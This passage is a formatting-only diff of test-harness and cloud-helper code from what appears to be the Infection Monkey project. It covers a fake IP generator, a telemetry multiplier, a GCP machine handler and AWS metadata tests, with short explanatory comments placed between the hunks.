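A short sketch of the filename scheme save_telemetry_to_file implements above: the first unused index in TELEM_DIR_PATH is prepended to the telemetry's name and method. The record below is invented for illustration; only "name" and "method" matter for the filename.

    telem = {"name": "scan", "method": "POST", "content": "{}"}
    SampleFileParser.save_telemetry_to_file(telem)  # writes ./tests/performance/telem_sample/0scanPOST
    SampleFileParser.save_telemetry_to_file(telem)  # next free slot: 1scanPOST
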
@@ -8,7 +8,7 @@ class FakeIpGenerator:
     def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
         fake_ips = []
         for i in range(len(real_ips)):
-            fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts))
+            fake_ips.append(".".join(str(part) for part in self.fake_ip_parts))
             self.increment_ip()
         return fake_ips

@@ -19,7 +19,7 @@ class FakeIpGenerator:
     def try_fix_ip_range(self):
         for i in range(len(self.fake_ip_parts)):
             if self.fake_ip_parts[i] > 256:
-                if i-1 < 0:
+                if i - 1 < 0:
                     raise Exception("Fake IP's out of range.")
-                self.fake_ip_parts[i-1] += 1
+                self.fake_ip_parts[i - 1] += 1
                 self.fake_ip_parts[i] = 1
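
Taken together with increment_ip (not shown in this diff), the two hunks above make FakeIpGenerator a base-256-style counter whose parts run from 1 to 256 before carrying into the part on their left. A sketch of the behaviour, matching the unit test near the end of this commit:

    gen = FakeIpGenerator()                           # fake_ip_parts == [1, 1, 1, 1]
    gen.generate_fake_ips_for_real_ips(["10.0.0.1"])  # -> ["1.1.1.1"]
    # ...the next 255 calls yield "1.1.1.2" through "1.1.1.256"...
    gen.generate_fake_ips_for_real_ips(["10.0.0.1"])  # 257th call -> ["1.1.2.1"] (carry)

One caveat for that test: its final assertion passes the *result* of generate_fake_ips_for_real_ips to assertRaises rather than the callable plus its arguments, so it may not exercise the "Fake IP's out of range." path the way the assertion suggests.
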
@@ -1,7 +1,8 @@
 import random

-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
-    FakeIpGenerator
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+    FakeIpGenerator,
+)


 class FakeMonkey:
@@ -6,24 +6,28 @@ from typing import Dict, List

 from tqdm import tqdm

-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
-    FakeIpGenerator
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
+    SampleFileParser,
+)
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+    FakeIpGenerator,
+)
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
+    FakeMonkey,
+)

-TELEM_DIR_PATH = './tests/performance/telemetry_sample'
+TELEM_DIR_PATH = "./tests/performance/telemetry_sample"
 LOGGER = logging.getLogger(__name__)


 class SampleMultiplier:
-
     def __init__(self, multiplier: int):
         self.multiplier = multiplier
         self.fake_ip_generator = FakeIpGenerator()

     def multiply_telems(self):
         telems = SampleFileParser.get_all_telemetries()
-        telem_contents = [json.loads(telem['content']) for telem in telems]
+        telem_contents = [json.loads(telem["content"]) for telem in telems]
         monkeys = self.get_monkeys_from_telems(telem_contents)
         for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
             for monkey in monkeys:
@@ -40,46 +44,61 @@ class SampleMultiplier:
         for monkey in monkeys:
             if monkey.on_island:
                 continue
-            if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \
-                    and not monkey.on_island:
-                telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid)
-                telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid)
+            if (
+                monkey.original_guid in telem["content"]
+                or monkey.original_guid in telem["endpoint"]
+            ) and not monkey.on_island:
+                telem["content"] = telem["content"].replace(
+                    monkey.original_guid, monkey.fake_guid
+                )
+                telem["endpoint"] = telem["endpoint"].replace(
+                    monkey.original_guid, monkey.fake_guid
+                )
             for i in range(len(monkey.original_ips)):
-                telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i])
+                telem["content"] = telem["content"].replace(
+                    monkey.original_ips[i], monkey.fake_ips[i]
+                )

     @staticmethod
     def offset_telem_times(iteration: int, telems: List[Dict]):
         for telem in telems:
-            telem['time']['$date'] += iteration * 1000
+            telem["time"]["$date"] += iteration * 1000

     def get_monkeys_from_telems(self, telems: List[Dict]):
         island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
         monkeys = []
-        for telem in [telem for telem in telems
-                      if 'telem_category' in telem and telem['telem_category'] == 'system_info']:
-            if 'network_info' not in telem['data']:
+        for telem in [
+            telem
+            for telem in telems
+            if "telem_category" in telem and telem["telem_category"] == "system_info"
+        ]:
+            if "network_info" not in telem["data"]:
                 continue
-            guid = telem['monkey_guid']
+            guid = telem["monkey_guid"]
             monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
             if not monkey_present:
-                ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']]
+                ips = [net_info["addr"] for net_info in telem["data"]["network_info"]["networks"]]
                 if set(island_ips).intersection(ips):
                     on_island = True
                 else:
                     on_island = False

-                monkeys.append(FakeMonkey(ips=ips,
-                                          guid=guid,
-                                          fake_ip_generator=self.fake_ip_generator,
-                                          on_island=on_island))
+                monkeys.append(
+                    FakeMonkey(
+                        ips=ips,
+                        guid=guid,
+                        fake_ip_generator=self.fake_ip_generator,
+                        on_island=on_island,
+                    )
+                )
         return monkeys

     @staticmethod
     def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
         island_ips = []
         for telem in telems:
-            if 'config' in telem:
-                island_ips = telem['config']['command_servers']
+            if "config" in telem:
+                island_ips = telem["config"]["command_servers"]
                 for i in range(len(island_ips)):
                     island_ips[i] = island_ips[i].replace(":5000", "")
         return island_ips
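
To make the rewriting above concrete, here is a toy example. The GUIDs and addresses are invented, and fake_guid/fake_ips are presumably filled in by FakeMonkey's constructor, whose body is not part of this diff:

    monkey = FakeMonkey(
        ips=["10.2.2.2"], guid="1111", fake_ip_generator=FakeIpGenerator(), on_island=False
    )
    telem = {"endpoint": "/api/telemetry/1111", "content": '{"guid": "1111", "ip": "10.2.2.2"}'}
    # The replacement loop above then substitutes every occurrence of "1111" with
    # monkey.fake_guid and "10.2.2.2" with monkey.fake_ips[0], in both "content" and
    # "endpoint", so each multiplied batch of telemetries looks like a distinct monkey.
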
@@ -1,19 +1,21 @@
 from unittest import TestCase

-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
-    FakeIpGenerator
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+    FakeIpGenerator,
+)


 class TestFakeIpGenerator(TestCase):
-
     def test_fake_ip_generation(self):
         fake_ip_gen = FakeIpGenerator()
         self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
         for i in range(256):
-            fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])
-        self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
+            fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])
+        self.assertListEqual(["1.1.2.1"], fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))
         fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
-        self.assertListEqual(['256.256.255.256', '256.256.256.1'],
-                             fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2']))
+        self.assertListEqual(
+            ["256.256.255.256", "256.256.256.1"],
+            fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1", "1.1.1.2"]),
+        )
         fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
-        self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
+        self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))
@@ -8,7 +8,9 @@ from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
 from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
 from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
+    SampleFileParser,
+)

 LOGGER = logging.getLogger(__name__)

@@ -17,7 +19,6 @@ MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60)


 class TelemetryPerformanceTest:
-
     def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
         self.island_client = island_client
         self.quick_performance_test = quick_performance_test
@@ -27,29 +28,40 @@ class TelemetryPerformanceTest:
         try:
             all_telemetries = SampleFileParser.get_all_telemetries()
         except FileNotFoundError:
-            raise FileNotFoundError("Telemetries to send not found. "
-                                    "Refer to readme to figure out how to generate telemetries and where to put them.")
+            raise FileNotFoundError(
+                "Telemetries to send not found. "
+                "Refer to readme to figure out how to generate telemetries and where to put them."
+            )
         LOGGER.info("Telemetries imported successfully.")
-        all_telemetries.sort(key=lambda telem: telem['time']['$date'])
+        all_telemetries.sort(key=lambda telem: telem["time"]["$date"])
         telemetry_parse_times = {}
-        for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"):
+        for telemetry in tqdm(
+            all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"
+        ):
             telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
             telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
-        test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME)
+        test_config = PerformanceTestConfig(
+            MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME
+        )
         PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
         if not self.quick_performance_test:
             self.island_client.reset_env()

     def get_telemetry_time(self, telemetry):
-        content = telemetry['content']
-        url = telemetry['endpoint']
-        method = SupportedRequestMethod.__getattr__(telemetry['method'])
+        content = telemetry["content"]
+        url = telemetry["endpoint"]
+        method = SupportedRequestMethod.__getattr__(telemetry["method"])

         return self.island_client.requests.get_request_time(url=url, method=method, data=content)

     @staticmethod
     def get_verbose_telemetry_endpoint(telemetry):
         telem_category = ""
-        if "telem_category" in telemetry['content']:
-            telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid']
-        return telemetry['endpoint'] + telem_category
+        if "telem_category" in telemetry["content"]:
+            telem_category = (
+                "_"
+                + json.loads(telemetry["content"])["telem_category"]
+                + "_"
+                + telemetry["_id"]["$oid"]
+            )
+        return telemetry["endpoint"] + telem_category
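
A side note on get_telemetry_time above: SupportedRequestMethod.__getattr__(...) turns the stored method string back into an enum member, which on the Python versions this code targets is equivalent to subscripting the enum class. A minimal sketch; the member values are an assumption (only GET is confirmed elsewhere in this diff):

    from enum import Enum

    class SupportedRequestMethod(Enum):  # assumed shape of the real class
        GET = "GET"
        POST = "POST"

    method = SupportedRequestMethod.__getattr__("POST")
    assert method is SupportedRequestMethod["POST"] is SupportedRequestMethod.POST
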
@@ -1,12 +1,17 @@
 from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
-from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
+from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
+    EndpointPerformanceTest,
+)
 from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
-from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
+from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
+    TelemetryPerformanceTest,
+)


 class TelemetryPerformanceTestWorkflow(BasicTest):
-
-    def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test):
+    def __init__(
+        self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test
+    ):
         self.name = name
         self.island_client = island_client
         self.performance_config = performance_config
@@ -15,10 +20,14 @@ class TelemetryPerformanceTestWorkflow(BasicTest):
     def run(self):
         try:
             if not self.quick_performance_test:
-                telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client,
-                                                              quick_performance_test=self.quick_performance_test)
+                telem_sending_test = TelemetryPerformanceTest(
+                    island_client=self.island_client,
+                    quick_performance_test=self.quick_performance_test,
+                )
                 telem_sending_test.test_telemetry_performance()
-            performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
+            performance_test = EndpointPerformanceTest(
+                self.name, self.performance_config, self.island_client
+            )
             assert performance_test.run()
         finally:
             if not self.quick_performance_test:
@@ -11,14 +11,21 @@ class GCPHandler(object):
     MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
     MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"

-    def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"):
+    def __init__(
+        self,
+        key_path="../gcp_keys/gcp_key.json",
+        zone="europe-west3-a",
+        project_id="guardicore-22050661",
+    ):
         self.zone = zone
         try:
             # pass the key file to gcp
             subprocess.call(GCPHandler.get_auth_command(key_path), shell=True)  # noqa: DUO116
             LOGGER.info("GCP Handler passed key")
             # set project
-            subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True)  # noqa: DUO116
+            subprocess.call(
+                GCPHandler.get_set_project_command(project_id), shell=True
+            )  # noqa: DUO116
             LOGGER.info("GCP Handler set project")
             LOGGER.info("GCP Handler initialized successfully")
         except Exception as e:
@@ -32,14 +39,18 @@ class GCPHandler(object):
         """
         LOGGER.info("Setting up all GCP machines...")
         try:
-            subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True)  # noqa: DUO116
+            subprocess.call(
+                (GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True
+            )  # noqa: DUO116
             LOGGER.info("GCP machines successfully started.")
         except Exception as e:
             LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)

     def stop_machines(self, machine_list):
         try:
-            subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True)  # noqa: DUO116
+            subprocess.call(
+                (GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True
+            )  # noqa: DUO116
             LOGGER.info("GCP machines stopped successfully.")
         except Exception as e:
             LOGGER.error("GCP Handler failed to stop network machines: %s" % e)
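
The %-style templates above expand into plain gcloud invocations, which also shows that machine_list is expected to be a single string of space-separated instance names. An illustrative expansion (instance names invented, zone taken from the __init__ default):

    command = GCPHandler.MACHINE_STARTING_COMMAND % ("machine-1 machine-2", "europe-west3-a")
    # -> "gcloud compute instances start machine-1 machine-2 --zone=europe-west3-a"
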
@@ -2,10 +2,14 @@ import pytest


 def pytest_addoption(parser):
-    parser.addoption("--island", action="store", default="",
-                     help="Specify the Monkey Island address (host+port).")
+    parser.addoption(
+        "--island",
+        action="store",
+        default="",
+        help="Specify the Monkey Island address (host+port).",
+    )


-@pytest.fixture(scope='module')
+@pytest.fixture(scope="module")
 def island(request):
     return request.config.getoption("--island")
@@ -31,22 +31,21 @@ machine_list = {
 }


-@pytest.fixture(scope='class')
+@pytest.fixture(scope="class")
 def island_client(island):
     island_client_object = MonkeyIslandClient(island)
     yield island_client_object


-@pytest.mark.usefixtures('island_client')
+@pytest.mark.usefixtures("island_client")
 # noinspection PyUnresolvedReferences
 class TestOSCompatibility(object):
-
     def test_os_compat(self, island_client):
         print()
         all_monkeys = island_client.get_all_monkeys_from_db()
         ips_that_communicated = []
         for monkey in all_monkeys:
-            for ip in monkey['ip_addresses']:
+            for ip in monkey["ip_addresses"]:
                 if ip in machine_list:
                     ips_that_communicated.append(ip)
                     break
@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"
@@ -6,11 +6,11 @@ import requests
 from common.cloud.environment_names import Environment
 from common.cloud.instance import CloudInstance

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

 AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
-AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
+AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
 ACCOUNT_ID_KEY = "accountId"

 logger = logging.getLogger(__name__)
@@ -20,6 +20,7 @@ class AwsInstance(CloudInstance):
     """
     Class which gives useful information about the current instance you're on.
     """
+
     def is_instance(self):
         return self.instance_id is not None

@@ -32,25 +33,35 @@ class AwsInstance(CloudInstance):
         self.account_id = None

         try:
-            response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2)
+            response = requests.get(
+                AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
+            )
             self.instance_id = response.text if response else None
             self.region = self._parse_region(
-                requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text)
+                requests.get(
+                    AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
+                ).text
+            )
         except (requests.RequestException, IOError) as e:
             logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))

         try:
             self.account_id = self._extract_account_id(
-                requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text)
+                requests.get(
+                    AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
+                ).text
+            )
         except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
-            logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
+            logger.debug(
+                "Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
+            )

     @staticmethod
     def _parse_region(region_url_response):
         # For a list of regions, see:
         # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
         # This regex will find any AWS region format string in the response.
-        re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
+        re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
         finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
         if finding:
             return finding[0]
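
The region parsing above works because an AWS region is a prefix of its availability zone name. Using the sample zone from the tests at the end of this commit:

    import re

    re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
    re.findall(re_phrase, "us-west-2b", re.IGNORECASE)  # -> ["us-west-2"]
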
@@ -6,24 +6,27 @@ from botocore.exceptions import ClientError

 from common.cloud.aws.aws_instance import AwsInstance

-__author__ = ['itay.mizeretz', 'shay.nehmad']
+__author__ = ["itay.mizeretz", "shay.nehmad"]

-INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList'
-INSTANCE_ID_KEY = 'InstanceId'
-COMPUTER_NAME_KEY = 'ComputerName'
-PLATFORM_TYPE_KEY = 'PlatformType'
-IP_ADDRESS_KEY = 'IPAddress'
+INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList"
+INSTANCE_ID_KEY = "InstanceId"
+COMPUTER_NAME_KEY = "ComputerName"
+PLATFORM_TYPE_KEY = "PlatformType"
+IP_ADDRESS_KEY = "IPAddress"

 logger = logging.getLogger(__name__)


 def filter_instance_data_from_aws_response(response):
-    return [{
-        'instance_id': x[INSTANCE_ID_KEY],
-        'name': x[COMPUTER_NAME_KEY],
-        'os': x[PLATFORM_TYPE_KEY].lower(),
-        'ip_address': x[IP_ADDRESS_KEY]
-    } for x in response[INSTANCE_INFORMATION_LIST_KEY]]
+    return [
+        {
+            "instance_id": x[INSTANCE_ID_KEY],
+            "name": x[COMPUTER_NAME_KEY],
+            "os": x[PLATFORM_TYPE_KEY].lower(),
+            "ip_address": x[IP_ADDRESS_KEY],
+        }
+        for x in response[INSTANCE_INFORMATION_LIST_KEY]
+    ]


 class AwsService(object):
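
A sketch of the shape filter_instance_data_from_aws_response translates; the input follows the SSM describe_instance_information keys named above, with invented values:

    response = {
        "InstanceInformationList": [
            {
                "InstanceId": "i-0abc",
                "ComputerName": "host-1",
                "PlatformType": "Linux",
                "IPAddress": "10.0.0.4",
            }
        ]
    }
    filter_instance_data_from_aws_response(response)
    # -> [{"instance_id": "i-0abc", "name": "host-1", "os": "linux", "ip_address": "10.0.0.4"}]
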
@@ -45,8 +48,8 @@ class AwsService(object):
     @staticmethod
     def get_client(client_type, region=None):
         return boto3.client(
-            client_type,
-            region_name=region if region is not None else AwsService.region)
+            client_type, region_name=region if region is not None else AwsService.region
+        )

     @staticmethod
     def get_session():
@@ -54,12 +57,12 @@ class AwsService(object):

     @staticmethod
     def get_regions():
-        return AwsService.get_session().get_available_regions('ssm')
+        return AwsService.get_session().get_available_regions("ssm")

     @staticmethod
     def test_client():
         try:
-            AwsService.get_client('ssm').describe_instance_information()
+            AwsService.get_client("ssm").describe_instance_information()
             return True
         except ClientError:
             return False
@@ -2,14 +2,13 @@ import pytest
 import requests
 import requests_mock

-from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX,
-                                           AwsInstance)
+from common.cloud.aws.aws_instance import AWS_LATEST_METADATA_URI_PREFIX, AwsInstance
 from common.cloud.environment_names import Environment


-INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0'
+INSTANCE_ID_RESPONSE = "i-1234567890abcdef0"

-AVAILABILITY_ZONE_RESPONSE = 'us-west-2b'
+AVAILABILITY_ZONE_RESPONSE = "us-west-2b"

 # from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
 INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
@@ -33,34 +32,33 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
 """


-EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0'
+EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"

-EXPECTED_REGION = 'us-west-2'
+EXPECTED_REGION = "us-west-2"

-EXPECTED_ACCOUNT_ID = '123456789012'
+EXPECTED_ACCOUNT_ID = "123456789012"


-def get_test_aws_instance(text={'instance_id': None,
-                                'region': None,
-                                'account_id': None},
-                          exception={'instance_id': None,
-                                     'region': None,
-                                     'account_id': None}):
+def get_test_aws_instance(
+    text={"instance_id": None, "region": None, "account_id": None},
+    exception={"instance_id": None, "region": None, "account_id": None},
+):
     with requests_mock.Mocker() as m:
         # request made to get instance_id
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
-        m.get(url, text=text['instance_id']) if text['instance_id'] else m.get(
-            url, exc=exception['instance_id'])
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
+        m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get(
+            url, exc=exception["instance_id"]
+        )

         # request made to get region
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
-        m.get(url, text=text['region']) if text['region'] else m.get(
-            url, exc=exception['region'])
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
+        m.get(url, text=text["region"]) if text["region"] else m.get(url, exc=exception["region"])

         # request made to get account_id
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
-        m.get(url, text=text['account_id']) if text['account_id'] else m.get(
-            url, exc=exception['account_id'])
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
+        m.get(url, text=text["account_id"]) if text["account_id"] else m.get(
+            url, exc=exception["account_id"]
+        )

         test_aws_instance_object = AwsInstance()
         return test_aws_instance_object
@@ -69,9 +67,13 @@ def get_test_aws_instance(text={'instance_id': None,
 # all good data
 @pytest.fixture
 def good_data_mock_instance():
-    return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
-                                       'region': AVAILABILITY_ZONE_RESPONSE,
-                                       'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
+    return get_test_aws_instance(
+        text={
+            "instance_id": INSTANCE_ID_RESPONSE,
+            "region": AVAILABILITY_ZONE_RESPONSE,
+            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+        }
+    )


 def test_is_instance_good_data(good_data_mock_instance):
@@ -97,9 +99,13 @@ def test_get_account_id_good_data(good_data_mock_instance):
 # 'region' bad data
 @pytest.fixture
 def bad_region_data_mock_instance():
-    return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
-                                       'region': 'in-a-different-world',
-                                       'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
+    return get_test_aws_instance(
+        text={
+            "instance_id": INSTANCE_ID_RESPONSE,
+            "region": "in-a-different-world",
+            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+        }
+    )


 def test_is_instance_bad_region_data(bad_region_data_mock_instance):
@@ -125,9 +131,13 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
 # 'account_id' bad data
 @pytest.fixture
 def bad_account_id_data_mock_instance():
-    return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
-                                       'region': AVAILABILITY_ZONE_RESPONSE,
-                                       'account_id': 'who-am-i'})
+    return get_test_aws_instance(
+        text={
+            "instance_id": INSTANCE_ID_RESPONSE,
+            "region": AVAILABILITY_ZONE_RESPONSE,
+            "account_id": "who-am-i",
+        }
+    )


 def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance):
@@ -153,35 +163,37 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
 # 'instance_id' bad requests
 @pytest.fixture
 def bad_instance_id_request_mock_instance(instance_id_exception):
-    return get_test_aws_instance(text={'instance_id': None,
-                                       'region': AVAILABILITY_ZONE_RESPONSE,
-                                       'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
-                                 exception={'instance_id': instance_id_exception,
-                                            'region': None,
-                                            'account_id': None})
+    return get_test_aws_instance(
+        text={
+            "instance_id": None,
+            "region": AVAILABILITY_ZONE_RESPONSE,
+            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+        },
+        exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
+    )


-@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
 def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance):
     assert bad_instance_id_request_mock_instance.is_instance() is False


-@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
 def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance):
     assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS


-@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
 def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
     assert bad_instance_id_request_mock_instance.get_instance_id() is None


-@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
 def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance):
     assert bad_instance_id_request_mock_instance.get_region() is None


-@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
 def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
     assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
@@ -189,35 +201,37 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
 # 'region' bad requests
 @pytest.fixture
 def bad_region_request_mock_instance(region_exception):
-    return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
-                                       'region': None,
-                                       'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
-                                 exception={'instance_id': None,
-                                            'region': region_exception,
-                                            'account_id': None})
+    return get_test_aws_instance(
+        text={
+            "instance_id": INSTANCE_ID_RESPONSE,
+            "region": None,
+            "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+        },
+        exception={"instance_id": None, "region": region_exception, "account_id": None},
+    )


-@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
 def test_is_instance_bad_region_request(bad_region_request_mock_instance):
     assert bad_region_request_mock_instance.is_instance()


-@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
 def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance):
     assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS


-@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
